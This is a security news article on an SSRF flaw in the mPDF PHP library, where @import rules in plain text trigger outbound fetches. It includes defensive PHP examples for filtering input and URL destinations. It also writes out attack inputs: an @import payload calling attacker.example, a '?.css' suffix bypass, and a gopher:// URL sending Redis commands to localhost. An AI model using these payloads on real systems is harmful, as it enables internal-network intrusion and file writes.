Thursday, April 16, 2026

Logic Flaw Puts 70M+ Users At Risk, Exposes Internal Networks

A subtle logic error in the popular mPDF PHP library allows attackers to trigger unauthorized web requests, potentially exposing internal networks even when user input is sanitized using standard PHP functions.

This flaw affects over 70 million installations on Packagist, a central PHP package repository, putting countless web applications at risk for server-side request forgery (SSRF) attacks.

Security researcher Bruno, known as brun0ne, detailed the issue in a recent Medium post, highlighting how mPDF’s CSS parsing mishandles @import rules.

mPDF converts HTML to PDF documents and is widely used in PHP projects for generating reports and invoices.

Developers often sanitize user-supplied HTML with functions like htmlentities() to prevent injection attacks, converting special characters such as < and > into the entities &lt; and &gt;. That protection does nothing against this flaw, because an @import rule needs none of the characters htmlentities() encodes.

How The Flaw Works

The vulnerability arises in mPDF’s WriteHTML method, which calls ReadCSS on the entire input HTML string rather than only on its CSS sections.

Inside ReadCSS, a preg_match_all() call scans that string for @import rules. The pattern treats the url() wrapper, the quotes around the target and the surrounding whitespace as optional, so @import url("x.css"), @import 'x.css' and a bare @import x.css all match, wherever in the document they appear.

Figure: PDF generated with mPDF from the example above.

This regex extracts URLs from anywhere in the HTML, including plain text outside <style> tags.

An attacker can therefore place a bare @import rule pointing at a URL they control in any text field; the regex still matches it because url(), the quotes and the whitespace are all optional. mPDF then fetches the URL with cURL, since it supports remote stylesheets whose URL ends in .css.

This bypasses typical safeguards because no raw HTML tags are needed. The .css requirement is easily met by appending ?.css or &.css to a URL, which does not break its query parameters.

Bruno tested this on mPDF 8.2.5 with PHP 8.3, confirming outbound requests to an external listener on webhook.site.
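The following is an added example for this article, not mPDF’s own code. It shows why htmlentities() leaves an @import rule untouched, how a permissive @import scan of the kind described above pulls a URL out of plain text, why a “.css” check applied to the whole URL is satisfied by “?.css”, and a pre-filter for untrusted fields along the lines the article recommends. The regex is an approximation of the described behaviour, not mPDF’s actual pattern, and the attacker.example URL and invoice text are constructed.

```php
<?php
declare(strict_types=1);

// Added example for this article; not mPDF's code.
// Constructed attacker-controlled text, e.g. a customer name on an invoice.
// It contains no <, >, & or quotes, so htmlentities() has nothing to encode.
const UNTRUSTED = 'ACME Ltd @import url(http://attacker.example/hit?.css) Dept 7';

/**
 * Approximation of the matching behaviour described in the article: the url()
 * wrapper, the quotes and the whitespace are optional, and the scan runs over
 * the whole document, not just <style> contents. Not mPDF's exact regex.
 * Returns every URL such a scan would pick out of $html.
 */
function extractImportUrls(string $html): array
{
    $re = '/@import\s+(?:url\(\s*)?[\'"]?([^\'"\s;)]+)[\'"]?\s*\)?\s*;?/i';
    preg_match_all($re, $html, $m);
    return $m[1];
}

/** Suffix check on the raw URL string: "http://h/admin?.css" satisfies it. */
function endsWithCssNaive(string $url): bool
{
    return str_ends_with(strtolower($url), '.css');
}

/** Suffix check on the URL path only, so "?.css" and "&.css" no longer count. */
function endsWithCssPath(string $url): bool
{
    $path = parse_url($url, PHP_URL_PATH);
    return is_string($path) && str_ends_with(strtolower($path), '.css');
}

/**
 * Pre-filter for an untrusted field that will be embedded in HTML for mPDF,
 * following the article's advice: refuse @import rules and anything carrying
 * a URL scheme ("://"). Returns the text unchanged or throws.
 */
function assertNoImportOrScheme(string $text): string
{
    if (preg_match('/@import\b/i', $text) === 1) {
        throw new InvalidArgumentException('untrusted text contains an @import rule');
    }
    if (preg_match('/[a-z][a-z0-9+.-]*:\/\//i', $text) === 1) {
        throw new InvalidArgumentException('untrusted text contains a URL scheme');
    }
    return $text;
}

// 1. Standard escaping: compare the escaped field with the original.
$escaped = htmlentities(UNTRUSTED, ENT_QUOTES, 'UTF-8');
var_dump($escaped === UNTRUSTED);

// 2. Run the permissive @import scan over the escaped text inside a tag.
$urls = extractImportUrls('<p>' . $escaped . '</p>');
print_r($urls);

// 3. Compare the tail-only ".css" check with the path-based one.
foreach ($urls as $url) {
    var_dump(endsWithCssNaive($url), endsWithCssPath($url));
}

// 4. Filter the untrusted field before it is placed in the HTML at all.
try {
    assertNoImportOrScheme(UNTRUSTED);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The filter in step 4 is deliberately strict: it rejects any legitimate text containing “://” as well. For fields where URLs are expected, validate the destination instead (scheme allowlist, no internal hosts) rather than relying on escaping, and apply the path-based suffix check rather than the tail-only one.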

Worse, the cURL handle mPDF uses accepts the gopher:// scheme, which lets an attacker send raw TCP data to internal ports.

Figure: Extracting URLs from @import rules.

Attackers can craft gopher URLs to interact with services such as Redis on localhost:6379, sending commands like “config set dir /tmp/” followed by “save” to write arbitrary files.

This enables port scanning, data exfiltration, or even remote code execution in misconfigured environments.

Implications and Fixes

Reported in May 2025, the issue remains unfixed, and MITRE has declined to assign a CVE because mPDF expects sanitized input and fetches external resources by design.

Maintainers argue it’s a feature request for built-in sanitization, not a vulnerability.

Developers should block special characters such as @, (, ), :, / and ? in user input when they are not needed, or at minimum reject strings containing ://.

For apps generating PDFs from user data, additional validation on @import patterns is crucial to prevent SSRF.
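Where URLs cannot simply be stripped from user data, the remaining defence is a destination policy for every URL an @import rule (or any other remote reference) would cause to be fetched. The following is an added example, not part of mPDF or the article: it refuses non-HTTP schemes such as gopher:// outright, refuses literal loopback, link-local and RFC 1918 addresses (which covers the localhost:6379 Redis case above), refuses URLs carrying userinfo, and resolves hostnames and checks every returned address. The DNS fixture and the candidate URLs are constructed so the script runs offline.

```php
<?php
declare(strict_types=1);

// Added example for this article; not mPDF's code.

/**
 * True for loopback, link-local, RFC 1918 and other reserved addresses, and
 * also for anything that is not a valid IP at all (fail closed).
 * filter_var() returns false when the address falls in a range excluded by
 * the flags: 10/8, 172.16/12, 192.168/16, fc00::/7 (NO_PRIV_RANGE) and
 * 0/8, 127/8, 169.254/16, 240/4, ::1, ::, fe80::/10 (NO_RES_RANGE).
 */
function isPrivateOrLocalIp(string $ip): bool
{
    return filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) === false;
}

/**
 * Decides whether a URL extracted from an @import rule may be fetched.
 * $resolve maps a hostname to its IP addresses; it defaults to DNS but can be
 * replaced by a fixture for offline use. Returns [bool $allowed, string $reason].
 */
function checkImportUrl(string $url, ?callable $resolve = null): array
{
    $resolve ??= static function (string $host): array {
        $ips = [];
        foreach ((dns_get_record($host, DNS_A | DNS_AAAA) ?: []) as $rr) {
            $ips[] = $rr['ip'] ?? $rr['ipv6'] ?? null;
        }
        return array_values(array_filter($ips));
    };

    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return [false, 'no scheme or host'];
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        // gopher://, file://, dict:// and any other scheme cURL knows are refused.
        return [false, "scheme '$scheme' not allowed"];
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return [false, 'userinfo in URL not allowed'];
    }
    $host = strtolower(trim($p['host'], '[]')); // strip IPv6 brackets
    if ($host === 'localhost' || str_ends_with($host, '.localhost')) {
        return [false, 'localhost is never a valid stylesheet host'];
    }
    $addresses = filter_var($host, FILTER_VALIDATE_IP) !== false ? [$host] : $resolve($host);
    if ($addresses === []) {
        return [false, "host '$host' did not resolve"];
    }
    foreach ($addresses as $ip) {
        if (isPrivateOrLocalIp($ip)) {
            return [false, "host '$host' resolves to internal address $ip"];
        }
    }
    return [true, "public $scheme destination"];
}

// Constructed DNS fixture so the demo needs no network access.
const FIXTURE_DNS = [
    'css.cdn.example'   => ['203.0.113.10'],
    'metadata.internal' => ['169.254.169.254'],
];
$fixture = static fn(string $host): array => FIXTURE_DNS[$host] ?? [];

// Constructed candidates: the gopher/Redis and loopback cases from the
// article, a hostname that resolves to a link-local address, a userinfo
// trick, and one legitimate public stylesheet.
$candidates = [
    'gopher://127.0.0.1:6379/_config%20set%20dir%20/tmp/',
    'http://127.0.0.1:6379/?.css',
    'http://[::1]/x.css',
    'http://localhost/site.css',
    'http://metadata.internal/latest.css',
    'http://user@10.0.0.5/style.css',
    'https://css.cdn.example/site.css',
];
foreach ($candidates as $url) {
    [$allowed, $reason] = checkImportUrl($url, $fixture);
    printf("%-5s %s  (%s)\n", $allowed ? 'ALLOW' : 'DENY', $url, $reason);
}
```

Two caveats. First, a check-then-fetch design leaves a DNS rebinding window between resolution and the request; if the fetch is under your control, pin the checked address (cURL’s CURLOPT_RESOLVE does this) or re-check at connect time. Second, because mPDF performs its own fetches, this policy is easiest to enforce by running it over URLs extracted from the HTML before WriteHTML() is called, backed by network egress rules that stop the PDF host from reaching internal services at all.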

While not a zero-day, this quirk underscores the risks posed by third-party libraries when handling untrusted input.

In summary, mPDF’s regex oversight turns a helpful tool into a potential attack vector, urging PHP developers to audit PDF generation code amid rising SSRF threats.

Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.